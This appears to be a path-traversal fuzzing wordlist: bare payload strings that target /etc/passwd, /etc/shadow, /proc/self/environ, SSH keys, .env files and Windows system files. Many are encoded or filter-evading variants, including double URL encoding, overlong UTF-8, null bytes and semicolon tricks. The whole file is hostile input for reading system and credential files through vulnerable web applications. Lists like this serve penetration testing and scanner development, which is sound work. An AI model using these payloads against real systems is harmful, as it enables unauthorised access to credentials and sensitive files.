../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
/etc/passwd
/etc/hosts
/etc/shadow
/proc/self/environ
/proc/self/cmdline
/var/log/auth.log
/var/log/nginx/access.log
/home/www-data/.ssh/authorized_keys
/app/.env
/config/.env
/web.config
/Windows/win.ini
C:\\Windows\\win.ini
C:\\boot.ini
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%255c..%255cwindows%255cwin.ini
..\..\..\..\windows\win.ini
....//....//....//etc//passwd
..;/..;/..;/etc;/passwd
..%00/../etc/passwd
..%2e%2e%2fetc%2fpasswd
..%2e/..%2e/etc/passwd
..%5c..%5cetc%5cpasswd